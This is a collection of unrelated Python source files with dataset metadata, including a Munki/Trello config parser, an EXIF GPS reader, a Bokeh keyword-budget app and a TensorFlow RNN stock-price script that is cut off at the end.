self.opts.add_argument('--showconfig', dest='showconfig',\n action='store_true',\n help='Display configuration and stop are parseing of arguments and contacting trello')\n\n for tuple in default_settings.cli_options:\n arg = tuple[0]\n help = tuple[1]\n defvalue = tuple[2]\n self.opts.add_argument(arg, help=help, default=defvalue)\n\n self.cli_args = self.opts.parse_args()\n\n def read_config(self, configfiles=None):\n cfgfiles = default_settings.config_file_locations\n if self.cli_args.config: \n cfgfiles.append(self.cli_args.config)\n\n # This allows us to override the config file settings for\n # things like testing; it should not normally be used\n if configfiles is not None:\n self.read_config_files = self.read(configfiles)\n return\n \n read_cfg_files = self.read(cfgfiles)\n self.read_config_files = len(read_cfg_files)\n\n # Strips quotes form the begining and end of option values\n # mainly to ensure that these are not present on the key, token\n # and boardids\n def _get_unquoted_option(self, section, key):\n value = self._get_option(section, key)\n value = re.sub('^(\\'|\")', '', value)\n value = re.sub('(\\'|\")$', '', value)\n return value\n\n def get_show_config(self):\n # As this is cannot be set in the config file \n # (which might be a bug):\n rv = False\n if self.cli_args.__contains__('showconfig'):\n rv = self.cli_args.__getattribute__('showconfig')\n\n return rv\n\n def get_app_key(self):\n return self._get_unquoted_option('main', 'key')\n\n def get_app_token(self):\n return self._get_unquoted_option('main', 'token')\n\n def get_boardid(self):\n return self._get_unquoted_option('main', 'boardid')\n\n def get_date_format(self):\n return self._get_option('main', 'date_format')\n\n def _get_option(self, section, option_name,\n cli_name=None, default_value=None):\n\n rv = default_value\n\n if self.has_option(section, option_name):\n rv = self.get(section, option_name)\n \n if cli_name is None:\n cli_name = option_name\n\n # Only look at cmd line if no config file\n if self.read_config_files <= 0 and self.cli_args.__contains__(cli_name):\n cli = self.cli_args.__getattribute__(cli_name)\n if cli is not None:\n rv = cli\n\n return rv\n \n def get_rssdirectory(self):\n return self._get_option('rssfeeds', 'rssdir')\n\n def get_rss_link_template(self):\n return self._get_option('rssfeeds', 'rss_link_template')\n\n def get_rss_icon_url_template(self):\n return self._get_option('rssfeeds', 'icon_url_template')\n\n def get_catalog_link_template(self):\n return self._get_option('rssfeeds', 'catalog_link_template')\n\n def get_guid_link_template(self):\n return self._get_option('rssfeeds', 'guid_link_template')\n\n def get_description_template(self):\n return self._get_option('rssfeeds', 'get_description_template',\n default_value = 'Software packages in %s catalog')\n\n def autostage_schedule(self, catalog=None):\n if have_dateutil == 0:\n print('python module dateutil is not installed')\n print('it is not possible to control scheduling')\n return None\n\n if catalog is None:\n if self.has_section('schedule'):\n return MunkiSchedule( self.items('schedule') )\n elif self.has_section('schedule_%s' % catalog ):\n return MunkiSchedule( self.items('schedule_%s' % catalog ) )\n\n return None\n\n def print_expected_trello(self):\n print()\n print('The current configuration expects a Trello board with the')\n print('following lists: ')\n print()\n for munki_cat in self.munki_catalogs():\n catname = munki_cat['catalog']\n\n list = munki_cat['list']\n to_list = munki_cat['to_list']\n \n print('\\tFor Munki catalog %s' % catname)\n print('\\t\\tTo list : %s' % to_list)\n print('\\t\\tPackage list: %s' % list)\n \n\nclass MunkiStagingConfigCatalogs(object):\n\n catalog_re = re.compile('munki_catalog_(\\w+)')\n\n def __init__(self, munki_staging_config):\n self.config = munki_staging_config\n self.len = None\n self.sections = munki_staging_config.sections()\n \n def __iter__(self):\n return self\n \n def __next__(self):\n while len(self.sections) > 0:\n section = self.sections.pop()\n rv = self.catalog_re.match(section)\n if rv:\n section_config = {}\n name = rv.group(1)\n section_config['section_name'] = name\n for opt in self.config.options(section):\n section_config[opt] = self.config.get(section, opt)\n\n return section_config\n\n raise StopIteration() \n\n\n def __len__(self):\n if self.len is None:\n self.len = 0\n for section in self.config.sections():\n if self.catalog_re.match(section):\n self.len = self.len + 1\n\n return self.len\n \n# Um ... this is basically the same as the above; do we need it ?\nclass MunkiStagingRepositories(object):\n\n mrepo_re = re.compile('munki_repo_(\\w+)')\n\n def __init__(self, munki_staging_config):\n self.config = munki_staging_config\n self.sections = munki_staging_config.sections()\n \n def __iter__(self):\n return self\n \n def __next__(self):\n while len(self.sections) > 0:\n section = self.sections.pop()\n rv = self.mrepo_re.match(section)\n if rv:\n repo_config = {}\n name = rv.group(1)\n repo_config['repo_name'] = name\n for opt in self.config.options(section):\n repo_config[opt] = self.config.get(section, opt)\n\n return repo_config\n\n raise StopIteration() \n\n","sub_path":"munkistaging/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":13102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"369718638","text":"# model settings\nnorm_cfg = dict(type='BN', requires_grad=True)\nmodel = dict(\n type='SigmoidEncoderDecoder',\n score_thr=0.5,\n mode='noco',\n pretrained='open-mmlab://resnet50_v1c',\n backbone=dict(\n type='FlexResNet',\n depths=(3, 4, 6, 3),\n block='bottleneck',\n stem_channels=64,\n base_channels=64,\n stem_stride=2,\n max_pooling=True,\n in_channels=1,\n deep_stem=True,\n out_indices=(0, 1, 2, 3),\n dilations=(1, 1, 2, 4),\n strides=(1, 2, 1, 1),\n norm_cfg=norm_cfg,\n norm_eval=False,\n style='pytorch',\n contract_dilation=True,\n ),\n neck=dict(\n type='FlexFTP',\n ###### PVTv2 parameters ######\n # sr_ratios=[4, 2, 1, 1], # R_i\n sr_ratios=[1, 1, 1, 1], # R_i\n num_heads=4,\n mlp_ratio=0.5,\n # mlp_ratio=1,\n trans_lateral=False,\n ###### FlexFPN parameters ######\n out_inds=0,\n in_channels=[256, 512, 1024, 2048],\n out_channels=64,\n num_outs=4),\n decode_head=dict(\n type='FCNHead',\n in_channels=64,\n in_index=0,\n channels=32,\n num_convs=2,\n concat_input=True,\n dropout_ratio=0.1,\n num_classes=1,\n norm_cfg=norm_cfg,\n align_corners=False,\n loss_decode=dict(\n type='SoftIoULoss', loss_weight=1.0)),\n # model training and testing settings\n train_cfg=dict(),\n test_cfg=dict(mode='whole'))\n","sub_path":"configs/_base_/models/flex_ftp_r50-d8.py","file_name":"flex_ftp_r50-d8.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449195087","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\ndef process_grade(apps, schema_editor):\n CampusAmbassadorApplication = apps.get_model(\"ambassador\", \"CampusAmbassadorApplication\")\n for row in CampusAmbassadorApplication.objects.all():\n if row.grade not in [\"HSFR\", \"HSSO\", \"HSJR\", \"HSSR\", \"COFR\", \"COSO\"]:\n row.grade_other = row.grade\n row.grade = \"OTHR\"\n row.save()\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('ambassador', '0006_auto_20170321_0731'),\n ]\n\n operations = [\n migrations.RunPython(process_grade, reverse_code=migrations.RunPython.noop),\n ]\n","sub_path":"django/ambassador/migrations/0007_auto_20170321_0733.py","file_name":"0007_auto_20170321_0733.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"322143357","text":"import pandas as pd\nimport csv\nimport gc\n\nchunksize = 10 ** 5\ni = 0\nfor chunk_df in pd.read_csv('/hugedisk/apanchenko/sales_w2.csv', chunksize=chunksize, header=None):\n chunk_df.columns = ['plant', 'material', 'cat_id', 'subcat_id', 'group_id', 'calday',\n 'matrix_type', 'target', 'is_action', 'regular_price', 'action_price']\n for index, row in chunk_df.iterrows():\n csv_file = open('/hugedisk/apanchenko/plantmaterial/plant%dmaterial%d.csv' % (row[0], row[1]), 'a')\n writer = csv.writer(csv_file)\n writer.writerow(row)\n csv_file.close()\n \n del chunk_df\n gc.collect()\n \n i += 1\n print('%d%% DONE. The #%d chunk of 4817 was processed! To be continued... ' % (i / 4817 * 100, i))\n","sub_path":"csv_split.py","file_name":"csv_split.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"190413549","text":"import sys\nfrom os.path import dirname\nfrom os.path import join, abspath\n\nimport numpy as np\nimport pandas as pd\nfrom bokeh.core.properties import value\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import column, row\nfrom bokeh.models import ColumnDataSource, CustomJS\nfrom bokeh.models.widgets import Slider, Button, DataTable, TableColumn, \\\n NumberFormatter, Div\nfrom bokeh.plotting import figure\nfrom bokeh.transform import dodge\n\nsys.path.append(dirname(__file__))\nfrom knapsack import Knapsack\n\n# Constants -------------------------------------------------------------------\ncols = ['Keyword', 'daily_impressions_average', 'daily_clicks_average',\n 'ad_position_average', 'cpc_average', 'daily_cost_average', 'source']\nmetric = cols[1:-1]\n\n# Path to files\npath = abspath(join(dirname(__file__), 'tmp'))\n# read output of scraping and stats\nfull = pd.read_csv(join(path, \"jshleap_stats.csv\"), usecols=cols)\ndf = full.dropna()\nnan_idx = df.index\nnan_df = full[~full.index.isin(nan_idx)]\nminimum = min(df.daily_cost_average[df.daily_cost_average > 0])\nfirst_budget = max(minimum, 0.1)\nmaximum = min(400, max(df.daily_cost_average))\nchoice = ['GKP', 'Optimized']\n\n\n# Functions ###################################################################\ndef optimize_values(data_frame, capacity, label):\n data_frame = data_frame.drop_duplicates(subset='Keyword')\n cost = data_frame.daily_cost_average.copy(deep=True)\n cost[cost == 0] = minimum / 10\n values = (data_frame.daily_impressions_average +\n data_frame.daily_clicks_average) * (1 / cost)\n opt = Knapsack(items_names=data_frame.Keyword.to_list(),\n values=values.to_list(), capacity=capacity,\n weights=data_frame.daily_cost_average.tolist(),\n solve_type=5, name='Branch_n_bound_%s' % label)\n opt.get_results(print_it=True)\n df = data_frame[data_frame.Keyword.isin(opt.packed_items)]\n return df\n\n\ndef set_table_source(dataframe):\n data = {'Keyword': dataframe.Keyword,\n 'daily_impressions_average': dataframe.daily_impressions_average,\n 'daily_clicks_average': dataframe.daily_clicks_average,\n 'ad_position_average': dataframe.ad_position_average,\n 'cpc_average': dataframe.cpc_average,\n 'daily_cost_average': dataframe.daily_cost_average,\n 'source': dataframe.source}\n source = ColumnDataSource(data=data)\n return data, source\n\n\n# Body of app #################################################################\ndata, source = set_table_source(df)\ndata_missing, source_missing = set_table_source(nan_df)\ncurrent = optimize_values(df, first_budget, 'current')\ngkp = optimize_values(df[df.source == 'GKP'], first_budget, 'gkp')\nrelabel = ['Daily impressions', 'Daily Clicks', 'Ad Position', 'CPC',\n 'Daily Cost']\nbar_data = {'metric': relabel,\n choice[0]: np.log([gkp[x].sum() for x in metric]),\n choice[1]: np.log([current[x].sum() for x in metric])}\n\nbar_source = ColumnDataSource(data=bar_data)\n\np = figure(x_range=relabel, y_range=(-5, 15), plot_height=325,\n toolbar_location=None, tools=\"\",\n title='Relative Value change for baskets of words')\np.vbar(x=dodge('metric', -0.25, range=p.x_range), top=choice[0], width=0.2,\n source=bar_source, color=\"#c9d9d3\", legend=value(choice[0]))\np.vbar(x=dodge('metric', 0.25, range=p.x_range), top=choice[1], width=0.2,\n source=bar_source, color=\"#e84d60\", legend=value(choice[1]))\np.x_range.range_padding = 0.1\np.xgrid.grid_line_color = None\np.legend.location = \"top_left\"\np.legend.orientation = \"horizontal\"\np.yaxis.axis_label_text_font_size = '18pt'\np.xaxis.axis_label_text_font_size = '18pt'\n\n\ndef update():\n print('Slider Value', slider.value)\n current = optimize_values(df, slider.value, 'current')\n gkp = optimize_values(df[df.source == 'GKP'], slider.value, 'gkp')\n impressions = current.daily_impressions_average\n source.data = {'Keyword': current.Keyword,\n 'daily_impressions_average': impressions,\n 'daily_clicks_average': current.daily_clicks_average,\n 'ad_position_average': current.ad_position_average,\n 'cpc_average': current.cpc_average,\n 'daily_cost_average': current.daily_cost_average,\n 'source': current.source\n }\n bar_data[choice[0]] = np.log([gkp[x].sum() for x in metric])\n bar_data[choice[1]] = np.log([current[x].sum() for x in metric])\n bar_source.data = bar_data\n\n\nslider = Slider(title=\"Daily budget\", start=minimum, end=maximum,\n value=first_budget, step=0.1, format=\"0,0\")\nslider.on_change('value', lambda attr, old, new: update())\n\nbutton = Button(label=\"Download\", button_type=\"success\", width=400)\nbutton.callback = CustomJS(args=dict(source=source),\n code=open(join(dirname(__file__), \"download.js\")\n ).read())\n\ncolumns = [\n TableColumn(field=\"Keyword\", title=\"Keyword\"),\n TableColumn(field=\"daily_cost_average\", title=\"Cost\",\n formatter=NumberFormatter(format=\"$0,0.00\")),\n TableColumn(field=\"ad_position_average\", title=\"Position\"),\n TableColumn(field=\"daily_clicks_average\", title=\"Clicks\"),\n TableColumn(field=\"cpc_average\", title=\"CPC\"),\n TableColumn(field=\"daily_impressions_average\", title='Impressions'),\n TableColumn(field=\"source\", title='Source')\n]\n\ndiv = Div(text=\"\"\"Optimized keywords\"\"\", width=400, height=20)\ndiv_missing = Div(text=\"\"\"Keywords without data\"\"\", width=400, height=20\n )\ndata_table = DataTable(source=source, columns=columns, width=450, height=200)\n\ndata_table_nans = DataTable(source=source_missing, columns=columns,\n width=450, height=200)\n\nlayout = row(column(div, data_table, button, sizing_mode=\"scale_width\"),\n column(p, sizing_mode=\"scale_width\"))\ncurdoc().add_root(slider)\ncurdoc().add_root(layout)\ncurdoc().add_root(row(column(div_missing, data_table_nans,\n sizing_mode=\"scale_width\"),\n sizing_mode=\"scale_width\"))\ncurdoc().title = \"Export CSV\"\n\nupdate()\n","sub_path":"ADvantage_web_example/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"283704104","text":"from matrixOp import transpose, multiply, inverse\r\nfrom utils import myMatrix\r\n\r\n\r\nclass MyLinearMultivariateRegression:\r\n\r\n def __init__(self):\r\n self.__intercept = 0.0\r\n self.__coefs = []\r\n\r\n @property\r\n def intercept(self):\r\n return self.__intercept\r\n\r\n @property\r\n def coefs(self):\r\n return self.__coefs\r\n\r\n def fit(self, inputs, outputs):\r\n\r\n for i in range(len(inputs)):\r\n inputs[i].insert(0, 1)\r\n\r\n X = inputs\r\n Y = myMatrix(outputs)\r\n\r\n XT = transpose(X)\r\n p = multiply(XT, X)\r\n p1 = inverse(p)\r\n p2 = multiply(p1, XT)\r\n w = multiply(p2, Y)\r\n\r\n self.__intercept = w[0][0]\r\n self.__coefs = [w[i][0] for i in range(1, len(w))]\r\n\r\n def predict(self, inputs):\r\n outputs = []\r\n for input in inputs:\r\n prediction = self.__intercept\r\n for pos in range(len(self.__coefs)):\r\n prediction += input[pos] * self.__coefs[pos]\r\n outputs.append(prediction)\r\n return outputs\r\n\r\n def predictionError(self, predictedOutputs, realOutputs):\r\n error = 0.0\r\n for o1, o2 in zip(predictedOutputs, realOutputs):\r\n error += (o1 - o2) ** 2\r\n\r\n return error / len(realOutputs)\r\n","sub_path":"LeastSquaresMethod/MyLinearMultivariateRegression.py","file_name":"MyLinearMultivariateRegression.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"554700367","text":"# Modified version of exifdump.py, written by Thierry Bousch \n# Public Domain\n\n# Exif information decoder\nimport os\nimport arcpy\nimport arcpy.da as da\n\ndef CreateBadPhotosTable(badphotostable, longestpath):\n arcpy.CreateTable_management(os.path.dirname(badphotostable), os.path.basename(badphotostable))\n # Add single Photo field to store the path of the photo that is missing GPS coordinates\n arcpy.AddField_management(badphotostable, \"Photo\", \"TEXT\", \"\", \"\", longestpath)\n # If table is dbf or arcinfo table, an unnecessary field \"Field1\" will have been added. Delete it\n delfields = [field.name for field in arcpy.ListFields(badphotostable) if not field.required and field.name != \"Photo\"]\n if delfields:\n arcpy.DeleteField_management(badphotostable, delfields)\n\ndef ListPhotos(folder):\n # Iterate recursively, finding photo files and passing them to the GenXYZ function\n list = []\n for (dirpath, dirnames, filenames) in os.walk(folder):\n for file in (f for f in filenames if os.path.splitext(f)[1].lower() in ('.tiff', '.tif', '.jpg', '.jpeg')):\n list.append(os.path.join(dirpath, file))\n list.sort()\n return list\n\ndef GetExifMetadata(file):\n \"\"\"Function that reads Exif metadata properties from a photo file and returns an object with properties: file (path), x (lon), y (lat), z (alt), and m (DateTime)\"\"\"\n\n class PhotoExifObj():\n \"\"\"Object that contains Exif metadata properties extracted from a photo file: file (path), x (lon), y (lat), z (alt), and m (DateTime)\"\"\"\n file = x = y = z = None\n d = -9999\n m = \"\"\n\n photo = PhotoExifObj()\n photo.file = file\n\n pic = open(file, \"rb\")\n #two cases: tif and jpg\n data = pic.read(4)\n while True:\n try:\n if data[0:4] == \"II*\\x00\" or data[0:4] == \"MM*\\x00\":\n pic.seek(0)\n data = pic.read()\n else:\n pic.seek(0)\n if pic.read(2) != str(\"\\xff\\xd8\"):\n break\n marker = pic.read(2)\n if marker == str(\"\\xff\\xe0\"):\n length = ord(pic.read(1)) * 256 + ord(pic.read(1))\n pic.read(length - 2)\n marker = pic.read(2)\n if ord(marker[0]) == 255:\n if ord(marker[1]) < 224 or ord(marker[1]) >239:\n break\n else:\n break\n header = pic.read(8)\n if header[2:6] != \"Exif\" or header[6:8] != \"\\x00\\x00\":\n pic.seek(0)\n exifHeaderLoc = pic.read().find(\"Exif\")\n if exifHeaderLoc > -1:\n pic.seek(0)\n header = pic.read()[exifHeaderLoc-2:exifHeaderLoc+6]\n pic.seek(0)\n pic.read(exifHeaderLoc+6)\n else:\n break\n length = ord(header[0]) * 256 + ord(header[1])\n data = pic.read(length-8)\n\n T = TIFF_file(data)\n L = T.list_IFDs()\n for i in range(len(L)):\n IFD = T.dump_IFD(L[i])\n exif_off = gps_off = 0\n for tag,type,values in IFD:\n if tag == 0x8769:\n exif_off = values[0]\n if tag == 0x8825:\n gps_off = values[0]\n if exif_off:\n dict = {}\n IFD = T.dump_IFD(exif_off)\n for tag in IFD:\n dict[tag[0]] = tag[2]\n if tag[0] == 0x9003:\n datetime = dict[0x9003]\n photo.m = datetime\n if gps_off:\n IFD = T.dump_IFD(gps_off)\n gpsdict = {}\n for each in IFD:\n gpsdict[each[0]] = each[2]\n lat = (float(gpsdict[2][0].num) / gpsdict[2][0].den) + \\\n ((float(gpsdict[2][1].num) / gpsdict[2][1].den) * (float(1) / 60)) + \\\n ((float(gpsdict[2][2].num) / gpsdict[2][2].den) * (float(1) / 3600))\n lat = -lat if gpsdict[1]== \"S\" else lat\n lon = (float(gpsdict[4][0].num) / gpsdict[4][0].den) + \\\n ((float(gpsdict[4][1].num) / gpsdict[4][1].den) * (float(1) / 60)) + \\\n ((float(gpsdict[4][2].num) / gpsdict[4][2].den) * (float(1) / 3600))\n lon = -lon if gpsdict[3] == \"W\" else lon\n try:\n alt = float(gpsdict[6][0].num) / gpsdict[6][0].den\n except:\n alt = None\n try:\n direction = list(gpsdict[17])[0].num/float(list(gpsdict[17])[0].den)\n except:\n direction = -9999\n photo.x = lon\n photo.y = lat\n photo.z = alt\n photo.d = direction\n if photo.x and photo.y and photo.z and photo.m and photo.d:\n break\n except:\n break\n finally:\n break\n return photo\n\ndef s2n_motorola(str):\n x = 0\n for c in str:\n x = (x << 8) | ord(c)\n return x\n\ndef s2n_intel(str):\n x = 0\n y = 0\n for c in str:\n x = x | (ord(c) << y)\n y = y + 8\n return x\n\nclass Fraction:\n\n def __init__(self, num, den):\n self.num = num\n self.den = den\n\n def __repr__(self):\n # String representation\n return '%d/%d' % (self.num, self.den)\n\n\nclass TIFF_file:\n\n def __init__(self, data):\n self.data = data\n self.endian = data[0]\n\n def s2n(self, offset, length, signed=0):\n slice = self.data[offset:offset+length]\n if self.endian == 'I':\n val = s2n_intel(slice)\n else:\n val = s2n_motorola(slice)\n # Sign extension ?\n if signed:\n msb = 1 << (8*length - 1)\n if val & msb:\n val = val - (msb << 1)\n return val\n\n def first_IFD(self):\n return self.s2n(4, 4)\n\n def next_IFD(self, ifd):\n entries = self.s2n(ifd, 2)\n return self.s2n(ifd + 2 + 12 * entries, 4)\n\n def list_IFDs(self):\n i = self.first_IFD()\n a = []\n while i:\n a.append(i)\n i = self.next_IFD(i)\n return a\n\n def dump_IFD(self, ifd):\n entries = self.s2n(ifd, 2)\n a = []\n for i in range(entries):\n entry = ifd + 2 + 12*i\n tag = self.s2n(entry, 2)\n type = self.s2n(entry+2, 2)\n if not 1 <= type <= 10:\n continue # not handled\n typelen = [ 1, 1, 2, 4, 8, 1, 1, 2, 4, 8 ] [type-1]\n count = self.s2n(entry+4, 4)\n #if count == 1:\n # count = 2\n offset = entry+8\n if count*typelen > 4:\n offset = self.s2n(offset, 4)\n if type == 2:\n # Special case: nul-terminated ASCII string\n values = self.data[offset:offset+count].split('\\x00', 1)[0]\n else:\n values = []\n signed = (type == 6 or type >= 8)\n for j in range(count):\n if type % 5:\n # Not a fraction\n value_j = self.s2n(offset, typelen, signed)\n else:\n # The type is either 5 or 10\n value_j = Fraction(self.s2n(offset, 4, signed),\n self.s2n(offset+4, 4, signed))\n values.append(value_j)\n offset = offset + typelen\n # Now \"values\" is either a string or an array\n a.append((tag,type,values))\n return a","sub_path":"Simple Map viewer/bin/Debug/ArcGISRuntime10.2.7/LocalServer64/ArcToolbox/Scripts/ExifUtils.py","file_name":"ExifUtils.py","file_ext":"py","file_size_in_byte":7987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"511013992","text":"import statistics\nimport PIL\nimport plotly\nimport plotly \nplotly.tools.set_credentials_file(username='ib.m.jorgensen', \n api_key='l9HRRRx9SozelyejpQ9V')\nimport math\n\nif __name__ == '__main__':\n seq = [0]\n \n for i in range(1,100):\n seq.append(statistics.mean(seq[:i]) + 1)\n\n prev = 0\n cur = 0\n cure = 0\n for i,v in enumerate(seq):\n if i >= 2:\n prev = math.exp(seq[i-1])\n cure = math.exp(seq[i])\n cur = seq[i]\n print(\"{: >4d}: {:.3f} {:.3f} {:.10f} {:.4f}\".format(\n i,cur,cure, cure - prev, math.log(i+1)+math.log(1.7810)))\n\n\n \n","sub_path":"170113riddle.py","file_name":"170113riddle.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"35946000","text":"import time\r\nupper=50000\r\nlower=10000\r\ni=lower\r\nfivecount=0\r\nwhile i <(upper):\r\n x=0\r\n count=0\r\n for x in range(5):\r\n y=str(i)\r\n if y[x]=='7':\r\n count+=1\r\n if count==2:\r\n fivecount+=1\r\n print(i,fivecount)\r\n i+=1\r\nprint(fivecount)\r\n","sub_path":"Allgemein_Programmieren/uni/intervall.py","file_name":"intervall.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"213338664","text":"\n# coding: utf-8\n\n# ## Introduction to the Dataset\n\n# In[3]:\n\ncsv_list = open('US_births_1994-2003_CDC_NCHS.csv').read().split('\\n')\n\n\n# In[4]:\n\ncsv_list[0:10]\n\n\n# ## Converting Data into a List of Lists\n\n# In[8]:\n\ndef read_csv(csv_file):\n f = open(csv_file).read()\n string_list = f.split('\\n')[1:]\n final_list = []\n for birth_list in string_list:\n int_fields = []\n string_fields = birth_list.split(',')\n for string in string_fields:\n int_fields.append(int(string))\n final_list.append(int_fields)\n return final_list\n\norganized_birth_data = read_csv('US_births_1994-2003_CDC_NCHS.csv')\n \n \n\n\n# In[9]:\n\norganized_birth_data[:10]\n\n\n# ## 1. Calculating the Number of Birth in Each Month\n\n# In[36]:\n\ndef month_births(births_list):\n births_per_month = {}\n for birth in births_list:\n if birth[1] not in births_per_month:\n births_per_month[birth[1]] = 0\n births_per_month[birth[1]] += birth[-1]\n return births_per_month\n\ncdc_month_births = month_births(organized_birth_data)\n\n\n# In[37]:\n\ncdc_month_births\n\n\n# ## 2. Calculating the Number of Births in Each Day of the Week\n\n# In[38]:\n\ndef dow_births(births_list):\n day_of_week_births = {}\n for births in births_list:\n if births[3] not in day_of_week_births:\n day_of_week_births[births[3]] = 0\n day_of_week_births[births[3]] += births[4]\n return day_of_week_births\n\ncdc_day_births = dow_births(organized_birth_data)\n\n\n# In[39]:\n\ncdc_day_births\n\n\n# ## A More General Function\n\n# In[40]:\n\ndef calc_counts(data, column):\n column_specific_birth = {}\n for births in data:\n if births[column] not in column_specific_birth:\n column_specific_birth[births[column]] = 0\n column_specific_birth[births[column]] += births[4]\n return column_specific_birth\n\ncdc_year_births = calc_counts(organized_birth_data, 0)\ncdc_month_births = calc_counts(organized_birth_data, 1)\ncdc_dom_births = calc_counts(organized_birth_data, 2)\ncdc_dow_births = calc_counts(organized_birth_data, 3)\n\n\n# In[41]:\n\ncdc_year_births\n\n\n# In[42]:\n\ncdc_month_births\n\n\n# In[43]:\n\ncdc_dom_births\n\n\n# In[44]:\n\ncdc_dow_births\n\n\n# In[ ]:\n\n\n\n","sub_path":"US+Birth+Exploration.py","file_name":"US+Birth+Exploration.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"550538433","text":"# Definition for a undirected graph node\n# class UndirectedGraphNode:\n# def __init__(self, x):\n# self.label = x\n# self.neighbors = []\n\nclass Solution:\n # @param node, a undirected graph node\n # @return a undirected graph node\n visit = {}\n def cloneGraph(self, node):\n if node == None:\n return None\n if self.visit.has_key(node):\n return self.visit[node]\n firstNode = UndirectedGraphNode(node.label)\n self.visit[node] = firstNode\n for i in xrange(len(node.neighbors)):\n firstNode.neighbors.append(self.cloneGraph(node.neighbors[i]))\n return firstNode","sub_path":"python/Clone Graph.py","file_name":"Clone Graph.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384332511","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 1 21:34:41 2018\n\n@author: mengzhehuang\n\"\"\"\nimport numpy as np\nimport os\nimport tensorflow as tf\n# to make this notebook's output stable across runs\ndef reset_graph(seed=42):\n tf.reset_default_graph()\n tf.set_random_seed(seed)\n np.random.seed(seed)\n# To plot pretty figures\nimport matplotlib\nimport matplotlib.pyplot as plt\nplt.rcParams['axes.labelsize'] = 14\nplt.rcParams['xtick.labelsize'] = 12\nplt.rcParams['ytick.labelsize'] = 12\n\n\nimport pandas as pd\n\n# Import data\ndata = pd.read_csv('data_stocks.csv')\n# Drop date variable\ndata = data.drop(['DATE'], 1)\n# Dimensions of dataset\n#n = data.shape[0]\n#p = data.shape[1]\n# Make data a numpy array\n\nx1 = data['SP500'].values\ny = data['NASDAQ.ADP'].values\ndata = np.c_[x1, y]\n\nn = 40000\ndata = data[n:,:]\n#data = data.reshape((data.shape[0],2))\n\nimport numpy.random\n\n\nplt.title(\"SP500\", fontsize=14)\nplt.plot(data)\nplt.legend(loc=\"upper left\")\nplt.xlabel(\"Time\")\nplt.show()\n\nreset_graph()\n\nn_inputs = 2\nn_steps = 30\nn_neurons = 200\nn_h_1 = 50\nn_outputs = 2\n#\n#\ndef next_batch(num): \n data_prev = data[num-n_steps:num,:]\n data_current = data[num-n_steps+1:num+1,:]\n return data_prev.reshape(-1, n_steps, n_outputs), data_current.reshape(-1, n_steps, n_outputs)\n\n\n#indices_perm = np.random.permutation(data.shape[0] - n_steps) + n_steps\n#for it in range(indices_perm.shape[0]):\n# i = indices_perm[it]\n# data_prev, data_current = next_batch(i)\n# \n \n\nX = tf.placeholder(tf.float32, [None, n_steps, n_inputs])\ny = tf.placeholder(tf.float32, [None, n_steps, n_outputs])\n\n\n\ncell = tf.contrib.rnn.BasicRNNCell(num_units=n_neurons, activation=tf.nn.relu)\nrnn_outputs, states = tf.nn.dynamic_rnn(cell, X, dtype=tf.float32)\n\nlearning_rate = 0.001\n\nstacked_rnn_outputs = tf.reshape(rnn_outputs, [-1, n_neurons])\nstacked_outputs_1 = tf.layers.dense(stacked_rnn_outputs, n_h_1)\nstacked_outputs_2 = tf.layers.dense(stacked_outputs_1, n_outputs)\noutputs = tf.reshape(stacked_outputs_2, [-1, n_steps, n_outputs])\n\nloss = tf.reduce_mean(tf.square(outputs - y))\noptimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)\ntraining_op = optimizer.minimize(loss)\n\ninit = tf.global_variables_initializer()\nsaver = tf.train.Saver()\n\nn_iterations = 2\nbatch_size = 1\n\nwith tf.Session() as sess:\n init.run()\n for iteration in range(n_iterations):\n indices_perm = np.random.permutation(data.shape[0] - n_steps) + n_steps\n for it in range(indices_perm.shape[0]):\n i = indices_perm[it]\n X_batch, y_batch = next_batch(i)\n sess.run(training_op, feed_dict={X: X_batch, y: y_batch})\n if it % 100 == 0:\n mse = loss.eval(feed_dict={X: X_batch, y: y_batch})\n print(it, \"\\tMSE:\", mse)\n saver.save(sess, \"./my_time_series_NASDAQ_ADP_0410\")\n\nwith tf.Session() as sess: # not shown in the book\n saver.restore(sess, \"./my_time_series_NASDAQ_ADP_0410\") # not shown\n indices_perm = np.random.permutation(data.shape[0] - n_steps) + n_steps\n# index = indices_perm[0]\n# t_new = t[index-n_steps+1:index+1]\n X_new, y_test = next_batch(i)\n# X_new = time_series(np.array(t_instance[:-1].reshape(-1, n_steps, n_inputs)))\n y_pred = sess.run(outputs, feed_dict={X: X_new})\n\n\nplt.plot(y_test[0,:,0], \"b-\", markersize=10, label=\"groundtruth\")\nplt.plot(y_pred[0,:,0], \"r-\", markersize=10, label=\"prediction\")\nplt.xlabel(\"Time\")\nplt.ylabel(\"x1\")\nplt.legend(loc=\"upper right\")\nplt.show()\n\nplt.plot(y_test[0,:,1], \"b-\", markersize=10, label=\"groundtruth\")\nplt.plot(y_pred[0,:,1], \"r-\", markersize=10, 